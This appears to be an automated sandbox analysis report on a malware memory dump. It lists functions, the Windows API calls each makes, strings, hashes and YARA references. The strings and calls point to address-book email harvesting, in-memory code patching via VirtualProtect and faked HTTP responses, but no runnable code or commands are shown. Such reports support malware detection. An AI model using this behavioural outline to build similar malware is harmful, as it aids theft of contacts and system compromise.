Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
String ID:
API String ID: 653387826-0
Opcode ID: e22076ecd162c82a0833c223b872df504d874c99692efae43307e4b610a2bddb
Instruction ID: 07f0c87957a5a5ebea8da6ecac463d861c48bd6755ad25d726dede669c5543d5
Opcode Fuzzy Hash: e22076ecd162c82a0833c223b872df504d874c99692efae43307e4b610a2bddb
Instruction Fuzzy Hash: B201A275200304EFEB20DF19DC04D6ABBF9EF84720B108529EA5697260D770FD02CB20

Uniqueness

Uniqueness Score: -1.00%

Function 049FDE18, Relevance: 7.5, APIs: 5, Instructions: 37COMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04A03079,?), ref: 049FDE20
GetVersion.KERNEL32 ref: 049FDE2F
GetCurrentProcessId.KERNEL32 ref: 049FDE4B
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 049FDE68
GetLastError.KERNEL32 ref: 049FDE87

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: e8090a6d27fe748a69f99941c1ea04214989fc90cc2c91fcde2c2603ff50e181
Instruction ID: f3d285726f2784913494081212b65d29e5a6deea53f5f3d50aa0e0206704a785
Opcode Fuzzy Hash: e8090a6d27fe748a69f99941c1ea04214989fc90cc2c91fcde2c2603ff50e181
Instruction Fuzzy Hash: 51F0C2787C1301ABEB209F30AC0D7A43BA5E770701F108A29EB53CA1F0E778A942CB14

Uniqueness

Uniqueness Score: -1.00%

Function 049FEA66, Relevance: 7.5, APIs: 5, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 049FEA73
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000040), ref: 049FEA83
CloseHandle.KERNEL32(00000000,?,?,00000040), ref: 049FEA8C
VirtualFree.KERNEL32(000003E8,00000000,00008000,?,00000000,049F2149,?,?,00000040), ref: 049FEAAA
VirtualFree.KERNEL32(00002710,00000000,00008000,?,00000000,049F2149,?,?,00000040), ref: 049FEAB7

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: FreeVirtual$CloseCurrentHandleObjectSingleThreadWait
String ID:
API String ID: 3667519916-0
Opcode ID: 311aa902d9ad7b987f5ba9f37a73ccbde03d27389034fa838a47db5ff65fd378
Instruction ID: 8ba40e8d51f734ebe5f450e80676624099b149adb64bee461350a32a5048c154
Opcode Fuzzy Hash: 311aa902d9ad7b987f5ba9f37a73ccbde03d27389034fa838a47db5ff65fd378
Instruction Fuzzy Hash: 74F01775200701ABFF20AA69DC48B1AB6ACFB98315F144629FA41925A0CB28FC02CB20

Uniqueness

Uniqueness Score: -1.00%

Function 049FB2CE, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185memoryCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,HTTP/1.1 404 Not Found,0000001A,?,?,?,04A170E8,?,?,?,?,?,049F244D,?,?,?), ref: 049FB3B1
HeapFree.KERNEL32(00000000,?,00000000,00000001,?,00000001,?,?,049F9268,?,00000001,00000000), ref: 049FB423
RtlAllocateHeap.NTDLL(00000000,04A170E8,00000000), ref: 049FB434

Part of subcall function 04A03947: RtlLeaveCriticalSection.NTDLL(04A170E8), ref: 04A039C4

Strings

HTTP/1.1 404 Not Found, xrefs: 049FB3A9

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateCriticalFreeLeaveSectionmemcpy
String ID: HTTP/1.1 404 Not Found
API String ID: 4231733408-2072751538
Opcode ID: 2b8645a20236d6d12e291d101ad821e071bcbe62ef086f9a8f763bea6b590811
Instruction ID: 285c16d25073c4b58dfdad49f16c5167624a9dcb84bdb3a8ff68860f1054cb6a
Opcode Fuzzy Hash: 2b8645a20236d6d12e291d101ad821e071bcbe62ef086f9a8f763bea6b590811
Instruction Fuzzy Hash: 62615171641606FFEB119F65CE80BA9B7AAFF08758F108139EB05C6A50E771F921DB80

Uniqueness

Uniqueness Score: -1.00%

Function 04A0CDE4, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70synchronizationCOMMON

Download Yara Rule

APIs

RtlUpcaseUnicodeString.NTDLL(?,?,00000001), ref: 04A0CE18
RtlFreeAnsiString.NTDLL(?), ref: 04A0CE8F
WaitForSingleObject.KERNEL32(00000000), ref: 04A0CE9C

Strings

?@, xrefs: 04A0CE77

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: String$AnsiFreeObjectSingleUnicodeUpcaseWait
String ID: ?@
API String ID: 2603241602-3895805154
Opcode ID: 0b2f312b286e7243818a17421e65caf5dcd782371bdc4f3611a437d5e3352bdf
Instruction ID: 0a0872acff5d05c87db34858203bdb7fbf0c802f0e6c1edcf69aee5b348a3cc3
Opcode Fuzzy Hash: 0b2f312b286e7243818a17421e65caf5dcd782371bdc4f3611a437d5e3352bdf
Instruction Fuzzy Hash: CC21DE71100214AFDB28DF64E88885BB7A9FB40320B10CB2AF441C75B0D734F895DB92

Uniqueness

Uniqueness Score: -1.00%

Function 04A0A8F0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 04A0A90D
lstrlen.KERNEL32(EMPTY,0000010E,00000000,00000008,00000000,?,?,?,?,04A0ED95,0000010E,00000008,log), ref: 04A0A94F
HeapFree.KERNEL32(00000000,00000000,EMPTY,00000000,?,?,?,04A0ED95,0000010E,00000008,log), ref: 04A0A969

Strings

EMPTY, xrefs: 04A0A946, 04A0A94E, 04A0A956

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreelstrlen
String ID: EMPTY
API String ID: 3886119090-1696604233
Opcode ID: 4638f0fb7dab58c43f59006d56da9d17b079536e66678a1c5a5abc0b970e48f8
Instruction ID: d57d46630110a255f70852f6dc783b4518dd1475d6403c4e07d1664397b77da1
Opcode Fuzzy Hash: 4638f0fb7dab58c43f59006d56da9d17b079536e66678a1c5a5abc0b970e48f8
Instruction Fuzzy Hash: C001B136600214FFEF219FA5EC48CAF7BBDEB98790F108025F90492160E279AE41D760

Uniqueness

Uniqueness Score: -1.00%

Function 04A0FBBE, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00001000,.dll,00000000,00000000,049F2A3D,00000000,00000000,00000000,?,04A022AD,04A17334,00001000,.dll,00000000,00001000,00000000), ref: 04A0FBC7
mbstowcs.NTDLL ref: 04A0FBEE
memset.NTDLL ref: 04A0FC00

Strings

.dll, xrefs: 04A0FBC0

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: lstrlenmbstowcsmemset
String ID: .dll
API String ID: 1748213358-2738580789
Opcode ID: 555b3e48e353cf745fae5208009d8e6fb702db97c3cfd12049b2c1c0408af3da
Instruction ID: 097a9d7e1234d386fafadcea029b2b8aae9e01e2818e6cf14559e98ef1e18895
Opcode Fuzzy Hash: 555b3e48e353cf745fae5208009d8e6fb702db97c3cfd12049b2c1c0408af3da
Instruction Fuzzy Hash: 50F0E277500701ABE7229EA49C88DAB76ADEBC8314B44493AFA41D7210EA21F90587B1

Uniqueness

Uniqueness Score: -1.00%

Function 049F6964, Relevance: 6.3, APIs: 5, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?), ref: 049F69C1
HeapFree.KERNEL32(00000000,?), ref: 049F69D2
HeapFree.KERNEL32(00000000,?), ref: 049F69EA
CloseHandle.KERNEL32(?), ref: 049F6A04
HeapFree.KERNEL32(00000000,?), ref: 049F6A19

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap$CloseHandle
String ID:
API String ID: 1910495013-0
Opcode ID: 29b11cfe606daf6483a8998162a1b2434c50ff9e0c241c3224edf22346c0a48e
Instruction ID: f31bcecf6d2807c4aac396d3e0c302fa1b81ed40faa789f49a7e89fca290055d
Opcode Fuzzy Hash: 29b11cfe606daf6483a8998162a1b2434c50ff9e0c241c3224edf22346c0a48e
Instruction Fuzzy Hash: 86214771201621AFD6119F69DC8882AFBBAFF59B107144424F548D3A60C732FCA2CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 04A08D3E, Relevance: 6.2, APIs: 4, Instructions: 192COMMON

Download Yara Rule

APIs

Part of subcall function 04A010B4: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 04A010CF
Part of subcall function 04A010B4: LoadLibraryA.KERNEL32(00000000), ref: 04A0111D
Part of subcall function 04A010B4: GetProcAddress.KERNEL32(00000000,WABOpen), ref: 04A0112F
Part of subcall function 04A010B4: RegCloseKey.ADVAPI32(?), ref: 04A01180

GetLastError.KERNEL32 ref: 04A08ECC
FreeLibrary.KERNEL32(?), ref: 04A08F34

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
String ID:
API String ID: 1730969706-0
Opcode ID: 90fce902a9114e980a183520f88007bec8c861ca64e9a20dd1f7bbc1b65a016e
Instruction ID: cac8666136cef5b18bcfaafa1fd09a266ec01e0a3daa054966726f47f99797b1
Opcode Fuzzy Hash: 90fce902a9114e980a183520f88007bec8c861ca64e9a20dd1f7bbc1b65a016e
Instruction Fuzzy Hash: 1471D575D0020AEFCF10EFE5D8849AEBBB9FF48308B14856DE515AB290D735A942CF64

Uniqueness

Uniqueness Score: -1.00%

Function 04A11295, Relevance: 6.1, APIs: 4, Instructions: 140stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000008,0000EA60,?,?,?,049F764B,?,0000EA60,00000000,00000000,00000000,?,049FCDE0,00000000,?), ref: 04A112A1

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

ResetEvent.KERNEL32(?,?,?,?,049F764B,?,0000EA60,00000000,00000000,00000000,?,049FCDE0,00000000,?,00000000,?), ref: 04A11318
GetLastError.KERNEL32(?,?,?,049F764B,?,0000EA60,00000000,00000000,00000000,?,049FCDE0,00000000,?,00000000,?,00000057), ref: 04A11345

Part of subcall function 04A02A35: RtlFreeHeap.NTDLL(00000000,?,049F10F7,?,?,0000002C,?), ref: 04A02A41

GetLastError.KERNEL32(?,?,?,049F764B,?,0000EA60,00000000,00000000,00000000,?,049FCDE0,00000000,?,00000000,?,00000057), ref: 04A11407

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
String ID:
API String ID: 943265810-0
Opcode ID: 49ba4777315aadce61e3b5597c6177009484e2e3e72e940f6eebf2dec57da11b
Instruction ID: b72c8ea33e73a2f1d384c11b5aa2ef39d8eae60208b11bdf4c63ca18e3c1b580
Opcode Fuzzy Hash: 49ba4777315aadce61e3b5597c6177009484e2e3e72e940f6eebf2dec57da11b
Instruction Fuzzy Hash: 404152B2600604BFEB219FA1DC89EBB7BFDEB18745F144929F642D50A0E774ED059B20

Uniqueness

Uniqueness Score: -1.00%

Function 04A04023, Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 04A040D0
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04A040E6
memset.NTDLL ref: 04A04186
memset.NTDLL ref: 04A04196

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 3e23e70895a12f423dcfa137e46e40abca2934f1a94fb9640eff6ecf7702b636
Instruction ID: c2e62d58e840fff35543a7233bfe246906bcd14f049708c45cbf6c80f870d180
Opcode Fuzzy Hash: 3e23e70895a12f423dcfa137e46e40abca2934f1a94fb9640eff6ecf7702b636
Instruction Fuzzy Hash: F2416072A00219ABEB10DFA8ED84BDE7774FF48314F10C569BA19AB1C0DB70BD548B91

Uniqueness

Uniqueness Score: -1.00%

Function 04A085F9, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 126COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(04A133AC,04A1338C,?,00000008), ref: 04A08739

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

Part of subcall function 04A0319E: lstrlenW.KERNEL32(?,00000000,?,?,00000000,04A0129F,00000000), ref: 04A031AF
Part of subcall function 04A0319E: lstrlenW.KERNEL32(04A13568,00000000,?,00000000,04A0129F,00000000), ref: 04A031C6

Strings

EmailAddressCollection/EmailAddress[%u]/Address, xrefs: 04A086BC
A8000A, xrefs: 04A08628
1.0, xrefs: 04A08623

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$AllocateErrorHeapLast
String ID: 1.0$A8000A$EmailAddressCollection/EmailAddress[%u]/Address
API String ID: 3415590935-2884085418
Opcode ID: b27e86e95195199b824f4c70c38d7c0f8707e57567c8ea0287ca3d5e4be8fb8a
Instruction ID: 8ed4e17c00c89461f3210f678d33f265cc1785a1327b47978fdf82e9faf885ab
Opcode Fuzzy Hash: b27e86e95195199b824f4c70c38d7c0f8707e57567c8ea0287ca3d5e4be8fb8a
Instruction Fuzzy Hash: D4413FB5A00205EFDF10EFA5D888EAEB7B9EF84704B148498E905EB251DB75FD01CB54

Uniqueness

Uniqueness Score: -1.00%

Function 049F58E4, Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

APIs

ResetEvent.KERNEL32(?,00000000,00000000,00000000,?,00000057,?,00000000,00000000), ref: 049FE824
GetLastError.KERNEL32 ref: 049FE83D
ResetEvent.KERNEL32(?), ref: 049FE8B6
GetLastError.KERNEL32 ref: 049FE8D1

Part of subcall function 04A008F2: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,00000057,?,00000000,00000000), ref: 04A00909
Part of subcall function 04A008F2: SetEvent.KERNEL32(?), ref: 04A00919

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Event$ErrorLastReset$ObjectSingleWait
String ID:
API String ID: 1123145548-0
Opcode ID: 8ab097cbe76bbdb26c2a72c8ea6d092ec9421ba10c494dd15b8d57b7281dadfe
Instruction ID: 6b1a98f8ed9c201d35405b1e98769f627cd7a094471fce4b32cffe8d016c8104
Opcode Fuzzy Hash: 8ab097cbe76bbdb26c2a72c8ea6d092ec9421ba10c494dd15b8d57b7281dadfe
Instruction Fuzzy Hash: D841C432A00204AFEF219FA5DC44A6EB7BDEF88364F504578E651D75A0E730FD819B20

Uniqueness

Uniqueness Score: -1.00%

Function 049F1B31, Relevance: 6.1, APIs: 4, Instructions: 105COMMON

Download Yara Rule

APIs

_strupr.NTDLL ref: 049F1B78
_strupr.NTDLL ref: 049F1BCA
_strupr.NTDLL ref: 049F1C05
_strupr.NTDLL ref: 049F1C3B

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: _strupr
String ID:
API String ID: 3408778250-0
Opcode ID: 1c11db41305b23093e344c40493f5a6066270e25f65f6d846da53d92ec9682da
Instruction ID: 108b0e8d0b64c759f9bb45b8b0396e21c9a499a1b9ed8db8d182f8a1c06b5ccd
Opcode Fuzzy Hash: 1c11db41305b23093e344c40493f5a6066270e25f65f6d846da53d92ec9682da
Instruction Fuzzy Hash: 4D415EB2800209DFEB21DF58DD84AEEB7BCEF48355F148426EA25D2165E734F945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04A008F2, Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,00000057,?,00000000,00000000), ref: 04A00909
SetEvent.KERNEL32(?), ref: 04A00919
GetLastError.KERNEL32 ref: 04A009A2

Part of subcall function 04A0586F: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00000000,?,?,?,04A11363,0000EA60,?,?,?,049F764B,?,0000EA60,00000000), ref: 04A0588A

Part of subcall function 04A02A35: RtlFreeHeap.NTDLL(00000000,?,049F10F7,?,?,0000002C,?), ref: 04A02A41

GetLastError.KERNEL32(00000000), ref: 04A009D7

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID:
API String ID: 602384898-0
Opcode ID: a5cdb0095a0b12fbcdb0fd492801d3004be2947c9ebd7c5e09881e433874b315
Instruction ID: d0acb767d77ea9b21cc380d4d8cd21801d9203090f3d2d4242849df7cb76b13b
Opcode Fuzzy Hash: a5cdb0095a0b12fbcdb0fd492801d3004be2947c9ebd7c5e09881e433874b315
Instruction Fuzzy Hash: 2B310475D04348EFEF21DFE5E884A9EB7F8EB08344F10896AD64292191D771EE459F10

Uniqueness

Uniqueness Score: -1.00%

Function 049F5B30, Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?), ref: 049F5B5F
SetEvent.KERNEL32(?), ref: 049F5BA9
TlsSetValue.KERNEL32(00000001), ref: 049F5BE3
TlsSetValue.KERNEL32(00000000), ref: 049F5BFF

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Value$Event
String ID:
API String ID: 3803239005-0
Opcode ID: d6fb1d9a62dde59fb8c1024714e9a15eaf55e65233084ec3a41452c8d1a71287
Instruction ID: 7539abb437c41eedc0e0497b3c4729d9e200a70144f43eafa9cfdb7f5968cb1d
Opcode Fuzzy Hash: d6fb1d9a62dde59fb8c1024714e9a15eaf55e65233084ec3a41452c8d1a71287
Instruction Fuzzy Hash: 0E21BC31200604FFEF219F68ED84DAE7BAAFB41721B524834FA02CA1A1D371FC529B50

Uniqueness

Uniqueness Score: -1.00%

Function 04A0C35C, Relevance: 6.1, APIs: 4, Instructions: 83memoryregistryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04A0C3B5
memcpy.NTDLL(00000018,?,?), ref: 04A0C3DE
RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_000023E3,00000000,000000FF,00000008), ref: 04A0C41D
HeapFree.KERNEL32(00000000,00000000), ref: 04A0C430

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
String ID:
API String ID: 2780211928-0
Opcode ID: 9ab6007e2cf223f8fc0c3e5105b1810ea40b2cfe2cf77f2237f54037d1c39bd5
Instruction ID: ca92e09f7b968f0b02d3f127e25a3721f24f9a58b060daaf3792acc73d843a65
Opcode Fuzzy Hash: 9ab6007e2cf223f8fc0c3e5105b1810ea40b2cfe2cf77f2237f54037d1c39bd5
Instruction Fuzzy Hash: 1C319474200305AFEB208F58EC44FAA7BA9FF54720F008629F956D62E0D775ED15CB60

Uniqueness

Uniqueness Score: -1.00%

Function 049FE32E, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 04A02F29: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04A02F5B
Part of subcall function 04A02F29: HeapFree.KERNEL32(00000000,00000000,?,?,049F7427,?,00000022,00000000,00000000,00000000,?,?), ref: 04A02F80

HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00004000,00000001,00000001,?,?,?,?,?,049F304C,?), ref: 049FE3E2
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00004000,00000001,00000001,?,?,?,?,?,049F304C,?), ref: 049FE406
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,049F304C,?,?,?,?,?,?,?), ref: 049FE411

Strings

https://, xrefs: 049FE35B

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$Allocate
String ID: https://
API String ID: 3472947110-4275131719
Opcode ID: 30427489d84ff1adf0e9fe949816f660b8e08887573f68148280bb9d63a2c66e
Instruction ID: e995f4fa0d6a54ef9d68dd4a9a2f153bb2d6ae2d64f590bae2f6dda5cb4b5048
Opcode Fuzzy Hash: 30427489d84ff1adf0e9fe949816f660b8e08887573f68148280bb9d63a2c66e
Instruction Fuzzy Hash: A5215131501218BBEF229F11DC48F9E3E69EF44759F118074FA086A1F0C7B5AE51DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 049F5EF7, Relevance: 6.1, APIs: 4, Instructions: 77stringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 049F5F26
lstrlen.KERNEL32(00000000), ref: 049F5F37

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

strcpy.NTDLL ref: 049F5F4E
StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 049F5F58

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeaplstrlenmemsetstrcpy
String ID:
API String ID: 528014985-0
Opcode ID: a589ac8ea82c573ae96f920dfe0f0e0210ac55b48c4c557d44e51118928a5b9e
Instruction ID: d1fbd0ac65bb91de7eaa20c1166df145b0c6958130d369e5763f2b40f9e7d008
Opcode Fuzzy Hash: a589ac8ea82c573ae96f920dfe0f0e0210ac55b48c4c557d44e51118928a5b9e
Instruction Fuzzy Hash: 8E21F276140301BFE7206F24DC88B2A77ECEF44725F018869FA92C6292EB79E8158B11

Uniqueness

Uniqueness Score: -1.00%

Function 04A10EB8, Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(05A98D20), ref: 04A10ECE
RtlLeaveCriticalSection.NTDLL(05A98D20), ref: 04A10EE9
GetLastError.KERNEL32 ref: 04A10F57
GetLastError.KERNEL32 ref: 04A10F66

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: CriticalErrorLastSection$EnterLeave
String ID:
API String ID: 2124651672-0
Opcode ID: cd9cb137db4737ac647a28bdf88105a5d3897dc589773e27b4a4c3cb1cb2ca16
Instruction ID: c081f99cefb3c5bb08458c4ac64084e2adb36edf6aa3011737196ccebb9a89f8
Opcode Fuzzy Hash: cd9cb137db4737ac647a28bdf88105a5d3897dc589773e27b4a4c3cb1cb2ca16
Instruction Fuzzy Hash: 07212836904208EFDB12DFA4D945A9E7BB8FF48710F118159F815A2260D734EE569B50

Uniqueness

Uniqueness Score: -1.00%

Function 049FF9A1, Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 049FF9C3
lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 049FFA07
OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 049FFA4D
CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 049FFA70

Part of subcall function 04A0968F: GetTickCount.KERNEL32 ref: 04A0969F
Part of subcall function 04A0968F: CreateFileW.KERNEL32(049F117D,80000000,00000003,04A17160,00000003,00000000,00000000,?,00000000,?,049F117D), ref: 04A096BC
Part of subcall function 04A0968F: GetFileSize.KERNEL32(049F117D,00000000,Local\,00000001,?,00000000,?,049F117D), ref: 04A096E8
Part of subcall function 04A0968F: CreateFileMappingA.KERNEL32(049F117D,04A17160,00000002,00000000,00000000,049F117D), ref: 04A096FC
Part of subcall function 04A0968F: lstrlen.KERNEL32(049F117D,?,00000000,?,049F117D), ref: 04A09718
Part of subcall function 04A0968F: lstrcpy.KERNEL32(?,049F117D), ref: 04A09728
Part of subcall function 04A0968F: HeapFree.KERNEL32(00000000,049F117D,?,00000000,?,049F117D), ref: 04A09743
Part of subcall function 04A0968F: CloseHandle.KERNEL32(049F117D,Local\,00000001,?,00000000,?,049F117D), ref: 04A09755

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
String ID:
API String ID: 3239194699-0
Opcode ID: 352f18512a083b0402f41c00f95954b467203a5c73da2f27d2c800d3108f52c8
Instruction ID: 0c0065e90d6f86fe3d1f8514c7960e649d4f12dd1c85eadc61858b0eab06dee2
Opcode Fuzzy Hash: 352f18512a083b0402f41c00f95954b467203a5c73da2f27d2c800d3108f52c8
Instruction Fuzzy Hash: 78213B71500209EBEF20DF65DD44DEE7BBDEF44358F144126FA25921A4EB30E945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04A07186, Relevance: 6.1, APIs: 4, Instructions: 70fileCOMMON

Download Yara Rule

APIs

Part of subcall function 049FB864: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,04A0719D), ref: 049FB88A

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 04A071D8
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,04A07902,4C72644C), ref: 04A071EA
ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,04A07902,4C72644C), ref: 04A07202
CloseHandle.KERNEL32(?,?,?,?,?,?,04A07902,4C72644C), ref: 04A0721D

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: File$CloseCreateHandleModuleNamePointerRead
String ID:
API String ID: 1352878660-0
Opcode ID: 3c99f2d02a832ac74ce48dfdc366d0dc43d3f28fcbd5019dc1a0b34f85582eea
Instruction ID: ba503934029bf30e29ae77b41f81ce5c932670bbf62c0cf48960aadf60554b0d
Opcode Fuzzy Hash: 3c99f2d02a832ac74ce48dfdc366d0dc43d3f28fcbd5019dc1a0b34f85582eea
Instruction Fuzzy Hash: A31160B5901118BAEF20AF65EC88EEFBE7DEF59754F108021F905E6090D774AE41C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 04A00F44, Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,?,?,049F1980), ref: 04A00F7C

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

lstrcpy.KERNEL32(00000000,?), ref: 04A00F93
StrChrA.SHLWAPI(00000000,0000002E,?,?,049F1980), ref: 04A00F9C
GetModuleHandleA.KERNEL32(00000000,?,?,049F1980), ref: 04A00FBA

Part of subcall function 049FD9EE: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,00000000,00000000,?,00000000,049F1980,00000000,00000004,?,00000000,?), ref: 049FDAC6
Part of subcall function 049FD9EE: VirtualProtect.KERNELBASE(?,00000004,?,?,00000000,049F1980,00000000,00000004,?,00000000,?,00000000,?,04A13608,0000001C,04A0750B), ref: 049FDAE1
Part of subcall function 049FD9EE: RtlEnterCriticalSection.NTDLL(04A17380), ref: 049FDB06

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
String ID:
API String ID: 105881616-0
Opcode ID: f91f0b5d8c10b349f994cf019dfeab90f589b69b2e7f6cc4521c786924d1978e
Instruction ID: 7c282064a649619de0743a4d9d421830567da5e73dff706b293ff2ea629b4280
Opcode Fuzzy Hash: f91f0b5d8c10b349f994cf019dfeab90f589b69b2e7f6cc4521c786924d1978e
Instruction Fuzzy Hash: 18213934A04205EFDB20DF69E858BAEBBF9EF44304F10C069E446DB2A0DB74E945DB50

Uniqueness

Uniqueness Score: -1.00%

Function 049F7B20, Relevance: 6.1, APIs: 4, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 049F7B3B
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 049F7B5F
